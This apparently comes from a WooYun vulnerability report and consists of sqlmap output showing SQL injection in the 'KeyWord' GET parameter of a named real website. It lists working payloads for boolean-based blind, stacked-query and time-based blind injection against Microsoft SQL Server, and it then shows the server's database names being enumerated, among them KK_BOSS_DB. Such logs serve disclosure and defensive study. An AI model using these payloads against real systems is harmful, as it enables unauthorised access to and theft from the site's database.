WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: KeyWord
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: KeyWord=1%' AND 1853=1853 AND '%'='
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: KeyWord=1%'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: KeyWord=1%' WAITFOR DELAY '0:0:5'--
---
[06:16:08] [INFO] testing Microsoft SQL Server
[06:16:08] [INFO] confirming Microsoft SQL Server
[06:16:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2012
[06:16:08] [INFO] fetching database names
[06:16:08] [INFO] fetching number of databases
[06:16:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[06:16:08] [INFO] retrieved:
[06:16:08] [WARNING] reflective value(s) found and filtering out
5
[06:16:10] [INFO] retrieved: KK_BOSS_DB
[06:16:45] [INFO] retrieved: master
[06:17:06] [INFO] retrieved: model
[06:17:24] [INFO] retrieved: msdb
[06:17:38] [INFO] retrieved: tempdb
available databases [5]:
[*] KK_BOSS_DB
[*] master
[*] model
[*] msdb
[*] tempdb
[06:17:57] [INFO] fetched data logged to text files under '/root/.sqlmap/output/studytv.cctv.com'